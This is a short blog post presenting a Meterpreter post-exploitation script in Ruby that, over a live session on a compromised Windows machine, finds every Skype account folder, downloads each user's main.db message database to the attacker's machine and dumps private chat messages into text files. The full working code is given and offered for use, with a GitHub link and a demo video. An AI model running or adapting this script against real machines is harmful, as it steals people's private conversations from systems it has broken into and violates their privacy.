terça-feira, 11 de março de 2014

Meterpreter Script (Skype_db)

Using this script you can download the main.db file of Skype users and extract the conversations into a .txt file.
Tested on: Windows 8 and Windows 7
Youtube Demo
Script: Github
#
# Script to extract skype logs :-)
# Author: MMxM ( hc0der.blogspot.com )
#

require 'date'

# The sqlite3 gem is used further down to read the downloaded main.db on the
# machine running the script; end the script cleanly when it cannot be loaded.
sqlite3_loaded = begin
  require 'sqlite3'
  true
rescue LoadError
  false
end

unless sqlite3_loaded
  print_error("You must have installed sqlite3 gem to script work !")
  raise Rex::Script::Completed
end

# Prints the script description followed by the generated option usage text.
#
# opts - the argument parser; only its #usage string is read here.
def show_help(opts)
  banner = [
    "\nDESCRIPTION:",
    "\n\tScript For Download main.db of skype",
    "\tAnd Extract Talk History"
  ]
  banner.each { |text| print_line(text) }
  print_line(opts.usage)
end

# Switches understood by the script: -h prints help, -l takes a path argument.
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Display This help menu" ],
  "-l" => [ true, "Set Custom Location of Skype to Extract Data From Users" ]
)

# `false` is the "no -l supplied" sentinel; it is replaced by the default below.
location = false

opts.parse(args) do |opt, _idx, val|
  if opt == "-h"
    show_help(opts)
    raise Rex::Script::Completed
  elsif opt == "-l"
    location = val
  end
end

# Default location: the Skype folder under %APPDATA%, with the variable
# expanded through the session's file API.
location = client.fs.file.expand_path("%APPDATA%") + "\\Skype" if location == false

# Probe the Skype directory through the session. Any error raised by the stat
# call is treated the same as "directory does not exist".
stat = begin
  client.fs.file.stat(location)
rescue StandardError
  nil
end

if stat.nil?
  print_error("Directory: #{location} not found !")
  print_error("You can set manually skype path , using opt -l")
  raise Rex::Script::Completed
end

print_status("Extracting Users from #{location}")

# Every entry of the Skype directory that is not on the skip list below is
# kept as a candidate account name. Entry names come from the remote file
# system, so they are untrusted input for everything that follows.
# NOTE(review): the dots in shared.xml, dns.ldb and shared.lck are unescaped
# and therefore match any character; the list is also not checked against
# entry type, so a stray file is kept as a "user" until the main.db lookup.
skip_list = /^(\.|\.\.|Content|DataRv|My Skype Received Files|Pictures|shared_dynco|shared_httpfe|shared.xml|dns.ldb|shared.lck)$/

users = []

client.fs.dir.foreach(location) do |entry|
  next if entry =~ skip_list

  users.push(entry)
end

unless users.any?
  print_error("No Users Found")
  raise Rex::Script::Completed
end

# System information reported by the session; the 'Computer' value names the
# per-host output folder below.
@info = client.sys.config.sysinfo

print_status("#{users.count} User(s) Found !")
print_status(users.join(", "))

# Account name (as a symbol) => local path of the downloaded main.db.
success_down = {}
users.each do |id|
  print_status("Downloading main.db from user #{id}")
  file_name = "#{location}\\#{id}\\main.db"
  stat = begin
    client.fs.file.stat(file_name)
  rescue StandardError
    nil
  end

  if stat.nil?
    print_error("File Not Found (#{file_name})")
    next
  end

  # The computer name and the account name both originate on the remote host
  # and end up in a local path. Rex::FileUtils.clean_path is the only
  # sanitisation applied to them here -- confirm it rejects separators and
  # ".." in the framework version in use.
  host_dir = Rex::FileUtils.clean_path(@info['Computer'])
  stamp = Time.now.strftime("%Y%m%d.%H%M")
  @output_dir = File.join(Msf::Config.log_directory, "scripts", "skype_history", host_dir, stamp)
  ::FileUtils.mkdir_p(@output_dir)

  final = File.join(@output_dir, Rex::FileUtils.clean_path(id), "main.db")
  client.fs.file.download_file(final, file_name)
  print_status("Saving file to #{final}")
  success_down[id.to_sym] = final
end

# Nothing was downloaded, so there is nothing to parse.
if success_down.empty?
  print_status("100% complete")
  raise Rex::Script::Completed
end

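print_good("Download Stage Terminated")
print_good("Now Extracting Data Into txt File")

# For each downloaded database, write the rows of the Messages table with
# type '61' to "<main.db path>.txt", one line per message, ordered by timestamp.
success_down.each do |user, log_file|
  print_status("Extracting data from #{user}")

  # Declared up front so the ensure clause can tell which resources were
  # actually opened; the original called txt_file.close unconditionally and
  # raised NoMethodError (hiding the real error) when File.new had failed.
  txt_file = nil
  db = nil
  stm = nil

  begin
    txt_log_file = log_file + ".txt"
    # The transcript holds private conversations: create it readable by the
    # owner only instead of relying on the process umask. The mode argument
    # only takes effect when the file is created.
    txt_file = File.new(txt_log_file, "a+", 0600)
    print_status("Txt Output Location: #{txt_log_file}")
    db = SQLite3::Database.open log_file
    stm = db.prepare "SELECT timestamp,author,from_dispname,body_xml,chatname FROM Messages WHERE type='61' order by timestamp"
    stm.execute.each do |row|
      sent_at, author, display_name, body, chat = row
      # Interpolation renders a NULL column as an empty string; the original
      # "+" concatenation raised TypeError on the first NULL field and, since
      # only SQLite3::Exception is rescued, aborted the whole script.
      when_sent = sent_at.nil? ? "" : Time.at(sent_at).to_s
      # Every field is text taken from a database produced on another host;
      # it is written verbatim, so treat the transcript as untrusted content
      # (control characters included) when viewing it.
      txt_file.puts "#{when_sent} #{author}(#{display_name}): #{body} (#{chat})"
    end
  rescue SQLite3::Exception => e
    print_error("Exception occured: #{e}")
  ensure
    stm.close if stm
    db.close if db
    txt_file.close if txt_file
  end
end

print_status("100% complete")
raise Rex::Script::Completed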
